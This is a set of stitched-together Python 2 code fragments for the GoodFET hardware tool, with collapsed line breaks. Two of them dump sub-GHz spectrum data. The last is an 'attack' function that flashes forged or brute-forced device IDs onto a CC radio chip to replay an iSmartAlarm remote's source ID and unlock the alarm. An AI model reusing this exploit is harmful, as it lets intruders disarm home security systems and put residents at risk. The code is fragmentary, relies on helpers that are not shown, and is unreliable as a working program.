from GoodFETCC import GoodFETCC from intelhex import IntelHex16bit, IntelHex import time # Sleep Intervals in Seconds sshsi = 1 # one second shsi = 10 # 10 seconds mdsi = 60 # 1 minute lgsi = 120 # 2 minutes xlgsi = 1200 # 20 minutes client = GoodFETCC() client.serInit() client.setup() client.start() # Start and stop if previously something failed client.CChaltcpu() client.CCreleasecpu() # Map channel number to approximate frequency # 0 == 902 thru 52 == 928 with a step of .5 MHz max_chan = 53 # however 0 IS included, so 53 chan_dict = dict([(x, ((x * .5) + 902)) for x in range(max_chan)]) #bytestart=0xf000; chan_data_start = 0xF000 # 53 chans x 6 bytes chan_min_start = 0xF13E # 53 chans x 1 byte
# # This code dumps the spectrum analyzer data from Mike Ossmann's # spectrum analyzer firmware. import sys; sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC; from intelhex import IntelHex16bit, IntelHex; import time; client=GoodFETCC(); client.serInit(); client.setup(); client.start(); bytescount=8*132; bytestart=0xf000; while 1: time.sleep(1); client.CChaltcpu(); dump=""; for foo in range(0,bytescount): dump=("%s %02x" % (dump,client.CCpeekdatabyte(bytestart+foo))); if foo%8==7: dump=dump+"\n"; print dump; sys.stdout.flush();
def attack(attack_type): try: global ser global args byte = '1' #Initialize GoodFET serial port connection client = GoodFETCC() client.serInit() # Connect to GoodFET client.setup() # Initialize GoodFET client multiple times, this is due to poor JTAG latching client.start() client.start() client.start() client.start() # Open serial pipe to Arduino ser = serial.Serial(args.port, 9600, timeout=0) if attack_type == '0': clearscreen() id = 'FFFFFFFFFFFFFF0000000000070000FF' bytes = bytearray.fromhex(id) counter = 0 #38520 while True: if counter == 65535: break counter += 1 bytes[13:15] = unhexlify(offset(counter)) f = StringIO(data(32752, bytes) + '\n:00000001FF') print pink("IHEX:\n" + f.getvalue() + '\n') client.flash(f) f.close() client.stop() sleep(2.5) serialpoke(byte) sleep(0.6) client.start() print green( "[SUCCESS] All 65536 ID's have been exhausted, good day.") exit_clean() else: global src_id print green( "[SUCCESS] Source ID captured from iSmartAlarm remote or sensor, attempting unlock...\n" ) id = 'FFFFFFFFFFFFFF00000000' + src_id + 'FF' bytes = bytearray.fromhex(id) if attack_type == '2': raw_input('Press [ENTER] when ready to unlock:') else: print yellowbold( "[INFO] Delay mode enabled. Waiting %i seconds till unlock" % args.delay) sleep(args.delay) f = StringIO(data(32752, bytes) + '\n:00000001FF') print pink("IHEX:\n" + f.getvalue() + '\n') client.flash(f) f.close() client.stop() sleep(2.5) serialpoke(byte) sleep(0.6) print green("[SUCCESS] Hopefully unlocked :D") exit_clean() except Exception, e: print red("\n[ERROR] An error occured while flashing ID's\n\t%s" % e) exit_clean()